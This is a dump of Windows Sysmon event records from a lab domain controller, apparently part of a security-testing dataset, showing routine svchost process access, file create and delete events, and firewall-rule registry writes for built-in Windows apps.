12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.597{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.582{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\MiracastView\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsefalse - rename failed with status 0xc0000022 23542300x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.582{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.566{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.566 13241300x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-1|C=S-1-15-3-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|M=microsoft.xboxgamecallableui_cw5n1h2txyewy|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|D=C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\|PFN=Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 23542300x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.566{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{29E20594-C289-41D5-84ED-FE195B8F34BE}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.566{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{A3F983BE-B33C-4CCC-AF0C-AD769014F6AF}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:02:18.550{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{39CE84A6-C1E6-4C4B-BAD6-6846B736BF30}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:18.550{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6325CD78-1520-4724-ABB2-E91DAF3D94B5}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 11241100x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.550{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.550 23542300x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.550{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:18.535{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 